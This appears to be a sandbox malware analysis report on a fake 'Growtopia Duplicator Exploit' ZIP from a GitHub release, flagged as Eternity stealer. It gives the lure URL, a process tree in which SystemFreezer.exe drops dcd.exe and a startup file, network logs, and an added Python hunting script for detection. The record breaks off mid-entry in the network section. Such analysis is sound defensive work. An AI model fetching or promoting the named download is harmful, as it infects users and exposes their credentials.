Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20231127-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    28/11/2023, 13:52 UTC

General

  • Target

    https://github.com/L3GOGT/Growtopia-Duplicator-Exploit/releases/download/working/GT.Duplicator.Exploit.zip

Score
10/10

Malware Config

Signatures

  • Detects Eternity stealer 2 IoCs
  • Eternity

    Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/L3GOGT/Growtopia-Duplicator-Exploit/releases/download/working/GT.Duplicator.Exploit.zip
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:8
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8ec1946f8,0x7ff8ec194708,0x7ff8ec194718
      2⤵
      PID:3140
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
      2⤵
      PID:4868
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
      2⤵
      PID:1636
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:4524
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
      2⤵
      PID:572
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
      2⤵
      PID:2188
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
      2⤵
      PID:1484
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
      2⤵
      PID:2208
    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8
      2⤵
      PID:4152
    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:4992
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5548 /prefetch:8
      2⤵
      PID:556
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
      2⤵
      PID:4456
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1320
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
      2⤵
      PID:4428
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
      2⤵
      PID:1844
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
      2⤵
      PID:3308
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3440 /prefetch:2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:4884
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:2516
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:4392
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:2168
  • C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip\GT Duplicator Exploit\SystemFreezer.exe
    "C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip\GT Duplicator Exploit\SystemFreezer.exe"
    1⤵
    • Drops startup file
    • Suspicious use of AdjustPrivilegeToken
    PID:2292
    • C:\Users\Admin\AppData\Local\Temp\dcd.exe
      "C:\Users\Admin\AppData\Local\Temp\dcd.exe" -path=""
      2⤵
      • Executes dropped EXE
      PID:3180
  • C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip\GT Duplicator Exploit\SystemFreezer.exe
    "C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip\GT Duplicator Exploit\SystemFreezer.exe"
    1⤵
    • Drops startup file
    • Suspicious use of AdjustPrivilegeToken
    PID:5084
    • C:\Users\Admin\AppData\Local\Temp\dcd.exe
      "C:\Users\Admin\AppData\Local\Temp\dcd.exe" -path=""
      2⤵
      • Executes dropped EXE
      PID:4836
  • C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip\GT Duplicator Exploit\SystemFreezer.exe
    "C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip\GT Duplicator Exploit\SystemFreezer.exe"
    1⤵
    • Drops startup file
    • Suspicious use of AdjustPrivilegeToken
    PID:628
    • C:\Users\Admin\AppData\Local\Temp\dcd.exe
      "C:\Users\Admin\AppData\Local\Temp\dcd.exe" -path=""
      2⤵
      • Executes dropped EXE
      PID:4836
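The tree above is the whole lure chain in one place: Edge fetches the "duplicator exploit" ZIP from the GitHub release, the user opens the archive in Explorer and double-clicks SystemFreezer.exe, which therefore runs out of Explorer's Temp1_GT.Duplicator.Exploit.zip staging folder under %LOCALAPPDATA%\Temp; each of the three runs writes and executes C:\Users\Admin\AppData\Local\Temp\dcd.exe and drops a startup file. The script below is an added example, not tria.ge tooling or anything from the repository, that turns that pattern into two hunting rules over Sysmon-style process-creation events and correlates them into dropper chains. The events are reconstructed from the tree; the report does not show the parent of the top-level launches, so the explorer.exe parent and its PID 4000, and the benign setup.exe control event, are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Process-creation events reconstructed from the process tree above (Image,
# ProcessId and the parent/child links as reported). The report does not name
# the parent of the top-level launches; explorer.exe with PID 4000 is assumed,
# because Temp<N>_<archive>.zip under %LOCALAPPDATA%\Temp is the folder Explorer
# stages a file in when the user double-clicks it inside an opened ZIP. The last
# event is a constructed benign control: an installer run from Temp directly.
EVENTS: List[Dict[str, str]] = [
    {"ProcessId": "8", "ParentProcessId": "4000",
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": "2292", "ParentProcessId": "4000",
     "Image": r"C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip"
              r"\GT Duplicator Exploit\SystemFreezer.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": "3180", "ParentProcessId": "2292",
     "Image": r"C:\Users\Admin\AppData\Local\Temp\dcd.exe",
     "ParentImage": r"C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip"
                    r"\GT Duplicator Exploit\SystemFreezer.exe"},
    {"ProcessId": "4100", "ParentProcessId": "4000",
     "Image": r"C:\Users\Admin\AppData\Local\Temp\setup.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Explorer's ZIP staging folder: ...\AppData\Local\Temp\Temp<N>_<archive>.zip\...
ZIP_STAGING = re.compile(r"\\AppData\\Local\\Temp\\Temp\d+_[^\\]+\.zip\\", re.IGNORECASE)
# An executable sitting loose in %LOCALAPPDATA%\Temp, the way dcd.exe does.
LOOSE_TEMP_EXE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", re.IGNORECASE)

RULE_STAGED = "exec_from_explorer_zip_staging"
RULE_DROPPER = "zip_staged_parent_runs_loose_temp_exe"


def classify(event: Dict[str, str]) -> List[str]:
    """Names of the rules one event matches; an empty list means nothing fired."""
    hits = []
    if ZIP_STAGING.search(event["Image"]):
        hits.append(RULE_STAGED)
    if ZIP_STAGING.search(event["ParentImage"]) and LOOSE_TEMP_EXE.search(event["Image"]):
        hits.append(RULE_DROPPER)
    return hits


def hunt(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """ProcessId -> matched rules, for every event that matched at least one rule."""
    return {ev["ProcessId"]: classify(ev) for ev in events if classify(ev)}


def dropper_chains(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(parent PID, child PID) pairs where a ZIP-staged binary launched a loose Temp exe.

    Correlating on ParentProcessId, not just on the path strings, ties the two
    rules to one lineage, which is what the report shows three times
    (SystemFreezer.exe -> dcd.exe)."""
    staged = {ev["ProcessId"] for ev in events if RULE_STAGED in classify(ev)}
    return [(ev["ParentProcessId"], ev["ProcessId"])
            for ev in events
            if RULE_DROPPER in classify(ev) and ev["ParentProcessId"] in staged]


if __name__ == "__main__":
    for pid, rules in hunt(EVENTS).items():
        print(pid, ", ".join(rules))
    print("dropper chains:", dropper_chains(EVENTS))
```

The first rule alone is noisy in environments where users routinely run tools straight from ZIP views; the second rule, and above all the parent/child chain, is what separates this sample from that habit. The setup.exe control shows the dropper rule does not fire for an ordinary installer run from Temp by Explorer.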

                                  Network

                                  • Country: US
                                    DNS
                                    67.31.126.40.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    67.31.126.40.in-addr.arpa
                                    IN PTR
                                    Response
                                  • Country: US
                                    DNS
                                    github.com
                                    msedge.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    github.com
                                    IN A
                                    Response
                                    github.com
                                    IN A
                                    140.82.121.4
                                  • Country: DE
                                    GET
                                    https://github.com/L3GOGT/Growtopia-Duplicator-Exploit/releases/download/working/GT.Duplicator.Exploit.zip
                                    msedge.exe
                                    Remote address:
                                    140.82.121.4:443
                                    Request
                                    GET /L3GOGT/Growtopia-Duplicator-Exploit/releases/download/working/GT.Duplicator.Exploit.zip HTTP/2.0
                                    host: github.com
                                    sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                    sec-ch-ua-mobile: ?0
                                    dnt: 1
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    sec-fetch-site: none
                                    sec-fetch-mode: navigate
                                    sec-fetch-user: ?1
                                    sec-fetch-dest: document
                                    accept-encoding: gzip, deflate, br
                                    accept-language: en-US,en;q=0.9
                                    Response
                                    HTTP/2.0 302
                                    server: GitHub.com
                                    date: Tue, 28 Nov 2023 13:52:13 GMT
                                    content-type: text/html; charset=utf-8
                                    vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                    location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/720728519/61dfee5a-f15d-4efe-af74-89e64074c3e8?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231128T135213Z&X-Amz-Expires=300&X-Amz-Signature=015bdac000d887ef1119379a29a54a90df4fc22aa6110245de2f8a59376b7574&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=720728519&response-content-disposition=attachment%3B%20filename%3DGT.Duplicator.Exploit.zip&response-content-type=application%2Foctet-stream
                                    cache-control: no-cache
                                    strict-transport-security: max-age=31536000; includeSubdomains; preload
                                    x-frame-options: deny
                                    x-content-type-options: nosniff
                                    x-xss-protection: 0
                                    referrer-policy: no-referrer-when-downgrade
                                    content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.githubcopilot.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com support.github.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
                                    content-length: 0
                                    x-github-request-id: E8B0:62AC:1EBEFC2E:1F304021:6565F08D
                                  • Country: US
                                    DNS
                                    4.121.82.140.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    4.121.82.140.in-addr.arpa
                                    IN PTR
                                    Response
                                    4.121.82.140.in-addr.arpa
                                    IN PTR
                                    lb-140-82-121-4-fra.github.com
                                  • Country: US
                                    DNS
                                    95.221.229.192.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    95.221.229.192.in-addr.arpa
                                    IN PTR
                                    Response
                                  • Country: US
                                    DNS
                                    198.1.85.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    198.1.85.104.in-addr.arpa
                                    IN PTR
                                    Response
                                    198.1.85.104.in-addr.arpa
                                    IN PTR
                                    a104-85-1-198.deploy.static.akamaitechnologies.com
                                  • Country: US
                                    DNS
                                    objects.githubusercontent.com
                                    msedge.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    objects.githubusercontent.com
                                    IN A
                                    Response
                                    objects.githubusercontent.com
                                    IN A
                                    185.199.108.133
                                    objects.githubusercontent.com
                                    IN A
                                    185.199.109.133
                                    objects.githubusercontent.com
                                    IN A
                                    185.199.110.133
                                    objects.githubusercontent.com
                                    IN A
                                    185.199.111.133
                                  • Country: US
                                    GET
                                    https://objects.githubusercontent.com/github-production-release-asset-2e65be/720728519/61dfee5a-f15d-4efe-af74-89e64074c3e8?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231128T135213Z&X-Amz-Expires=300&X-Amz-Signature=015bdac000d887ef1119379a29a54a90df4fc22aa6110245de2f8a59376b7574&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=720728519&response-content-disposition=attachment%3B%20filename%3DGT.Duplicator.Exploit.zip&response-content-type=application%2Foctet-stream
                                    msedge.exe
                                    Remote address:
                                    185.199.108.133:443
                                    Request
                                    GET /github-production-release-asset-2e65be/720728519/61dfee5a-f15d-4efe-af74-89e64074c3e8?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231128T135213Z&X-Amz-Expires=300&X-Amz-Signature=015bdac000d887ef1119379a29a54a90df4fc22aa6110245de2f8a59376b7574&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=720728519&response-content-disposition=attachment%3B%20filename%3DGT.Duplicator.Exploit.zip&response-content-type=application%2Foctet-stream HTTP/2.0
                                    host: objects.githubusercontent.com
                                    dnt: 1
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    sec-fetch-site: none
                                    sec-fetch-mode: navigate
                                    sec-fetch-user: ?1
                                    sec-fetch-dest: document
                                    sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                    sec-ch-ua-mobile: ?0
                                    accept-encoding: gzip, deflate, br
                                    accept-language: en-US,en;q=0.9
                                    Response
                                    HTTP/2.0 200
                                    content-type: application/octet-stream
                                    content-md5: GfO0C695U/IGjsPxSKLBqg==
                                    last-modified: Sun, 19 Nov 2023 12:22:25 GMT
                                    etag: "0x8DBE8FA30AAC443"
                                    server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                    x-ms-request-id: 5edde0d4-001e-0005-1b02-22338e000000
                                    x-ms-version: 2020-04-08
                                    x-ms-creation-time: Sun, 19 Nov 2023 12:22:25 GMT
                                    x-ms-lease-status: unlocked
                                    x-ms-lease-state: available
                                    x-ms-blob-type: BlockBlob
                                    content-disposition: attachment; filename=GT.Duplicator.Exploit.zip
                                    x-ms-server-encrypted: true
                                    via: 1.1 varnish, 1.1 varnish
                                    accept-ranges: bytes
                                    date: Tue, 28 Nov 2023 13:52:14 GMT
                                    age: 0
                                    x-served-by: cache-iad-kcgs7200156-IAD, cache-ams21049-AMS
                                    x-cache: MISS, MISS
                                    x-cache-hits: 0, 0
                                    x-timer: S1701179534.065010,VS0,VE200
                                    content-length: 621971
                                  • Country: US
                                    DNS
                                    133.108.199.185.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    133.108.199.185.in-addr.arpa
                                    IN PTR
                                    Response
                                    133.108.199.185.in-addr.arpa
                                    IN PTR
                                    cdn-185-199-108-133.github.com
                                  • Country: US
                                    DNS
                                    9.228.82.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    9.228.82.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • Country: US
                                    DNS
                                    g.bing.com
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    g.bing.com
                                    IN A
                                    Response
                                    g.bing.com
                                    IN CNAME
                                    g-bing-com.a-0001.a-msedge.net
                                    g-bing-com.a-0001.a-msedge.net
                                    IN CNAME
                                    dual-a-0001.a-msedge.net
                                    dual-a-0001.a-msedge.net
                                    IN A
                                    204.79.197.200
                                    dual-a-0001.a-msedge.net
                                    IN A
                                    13.107.21.200
                                  • Country: US
                                    GET
                                    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid=
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid= HTTP/2.0
                                    host: g.bing.com
                                    accept-encoding: gzip, deflate
                                    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                    Response
                                    HTTP/2.0 204
                                    cache-control: no-cache, must-revalidate
                                    pragma: no-cache
                                    expires: Fri, 01 Jan 1990 00:00:00 GMT
                                    set-cookie: MUID=2A476F7E58156B910E6D7CA9595D6AD8; domain=.bing.com; expires=Sun, 22-Dec-2024 13:52:19 GMT; path=/; SameSite=None; Secure; Priority=High;
                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                    access-control-allow-origin: *
                                    x-cache: CONFIG_NOCACHE
                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    x-msedge-ref: Ref A: 3989A48A86A04827AC828F0B5CC2D2FC Ref B: BRU30EDGE0907 Ref C: 2023-11-28T13:52:19Z
                                    date: Tue, 28 Nov 2023 13:52:18 GMT
                                   • US
                                    GET
                                    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid=
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid= HTTP/2.0
                                    host: g.bing.com
                                    accept-encoding: gzip, deflate
                                    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                    cookie: MUID=2A476F7E58156B910E6D7CA9595D6AD8
                                    Response
                                    HTTP/2.0 204
                                    cache-control: no-cache, must-revalidate
                                    pragma: no-cache
                                    expires: Fri, 01 Jan 1990 00:00:00 GMT
                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                    access-control-allow-origin: *
                                    x-cache: CONFIG_NOCACHE
                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    x-msedge-ref: Ref A: 45C4889E966842BB9B390BD15808588A Ref B: BRU30EDGE0907 Ref C: 2023-11-28T13:52:19Z
                                    date: Tue, 28 Nov 2023 13:52:18 GMT
                                   • US
                                    GET
